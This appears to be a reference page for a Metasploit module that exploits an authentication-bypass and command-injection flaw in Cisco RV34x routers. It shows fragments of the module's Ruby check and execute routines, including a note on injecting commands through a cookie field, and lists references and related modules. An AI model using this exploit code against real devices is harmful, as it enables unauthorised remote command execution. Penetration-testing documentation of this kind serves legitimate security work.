Here is a relevant code snippet related to the "The target did not respond with a 200 OK." error message:
135: # with a command that returns immediately (id) and checks that the response looks like
136: # how a vulnerable target would respond.
137: def check
138: res = send_exploit('id')
139: return CheckCode::Unknown("Didn't receive a response from the target.") unless res
140: return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
141:
142: if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143: return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144: end
145:
The device responded to exploitation with a 200 OK.
Here is a relevant code snippet related to the "The device responded to exploitation with a 200 OK." error message:
138: res = send_exploit('id')
139: return CheckCode::Unknown("Didn't receive a response from the target.") unless res
140: return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
141:
142: if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143: return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144: end
145:
146: CheckCode::Safe('The target did not respond with an expected payload.')
147: end
148:
The target did not respond with an expected payload.
Here is a relevant code snippet related to the "The target did not respond with an expected payload." error message:
141:
142: if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
143: return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
144: end
145:
146: CheckCode::Safe('The target did not respond with an expected payload.')
147: end
148:
149: def execute_command(cmd, _opts = {})
150: # parsing of the cookie field is thrown off by ;. Replacing with && works fine, but the only
151: # downside is if the payload fails then it won't clean up after itself. Oddly, device's sh
The target did not respond with a 200 OK
Here is a relevant code snippet related to the "The target did not respond with a 200 OK" error message:
155:
156: # unix command holds the connection open. Meterpreter should not. I think this logic is fine though.
157: # If :unix_cmd gets a good check() value and then send_exploit returns with a nil response
158: # then that is a clear sign that :unix_cmd was successful
159: if target['Type'] != :unix_cmd
160: fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
161: body_json = res.get_json_document
162: fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
163: end
164:
165: print_good('Exploit successfully executed.')
The target did not respond with a JSON body
Here is a relevant code snippet related to the "The target did not respond with a JSON body" error message:
157: # If :unix_cmd gets a good check() value and then send_exploit returns with a nil response
158: # then that is a clear sign that :unix_cmd was successful
159: if target['Type'] != :unix_cmd
160: fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
161: body_json = res.get_json_document
162: fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
163: end
164:
165: print_good('Exploit successfully executed.')
166: end
167:
Go back to menu.
Related Pull Requests
- #16136 Merged Pull Request: Add a port of PetitPotam to Metasploit
- #16010 Merged Pull Request: New module Zabbix systemrun rce
- #16142 Merged Pull Request: Update metasploit-payloads gem to 2.0.72
- #16066 Merged Pull Request: Fix params not being passed to scripts
- #16025 Merged Pull Request: Fix msfdb init command failure when opting not to initialize webservices
- #15994 Merged Pull Request: Fix #12895, fix console.read does not return command output
- #16130 Merged Pull Request: Wordpress Plugin RegistrationMagic sqli (CVE-2021-24862)
- #16132 Merged Pull Request: [MySQL injection library] Avoid the use of '<>'
- #16014 Merged Pull Request: Change custom parsers to Rex Parser and add long arguments
References
- CVE-2021-1472
- CVE-2021-1473
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx
- https://seclists.org/fulldisclosure/2021/Apr/39
- https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/
See Also
Check also the following modules related to this module:
- exploit/linux/http/cisco_asax_sfr_rce
- exploit/linux/http/cisco_firepower_useradd
- exploit/linux/http/cisco_hyperflex_file_upload_rce
- exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec
- exploit/linux/http/cisco_prime_inf_rce
- exploit/linux/http/cisco_rv32x_rce
- exploit/linux/http/cisco_ucs_cloupia_script_rce
- exploit/linux/http/cisco_ucs_rce
- exploit/linux/misc/cisco_rv340_sslvpn
- exploit/linux/ssh/cisco_ucs_scpuser
- exploit/multi/http/cisco_dcnm_upload
- exploit/multi/http/cisco_dcnm_upload_2019
- exploit/windows/browser/cisco_anyconnect_exec
- exploit/windows/browser/cisco_playerpt_setsource
- exploit/windows/browser/cisco_playerpt_setsource_surl
- exploit/windows/browser/cisco_webex_ext
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/dos/cisco/ios_http_percentpercent
- auxiliary/dos/cisco/ios_telnet_rocem
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/windows/http/adobe_robohelper_authbypass
- exploit/windows/http/ca_arcserve_rpc_authbypass
- exploit/windows/ssh/freesshd_authbypass
- auxiliary/pdf/foxit/authbypass
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
Related Nessus plugins:
Authors
- Takeshi Shiomitsu
- jbaines-r7
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
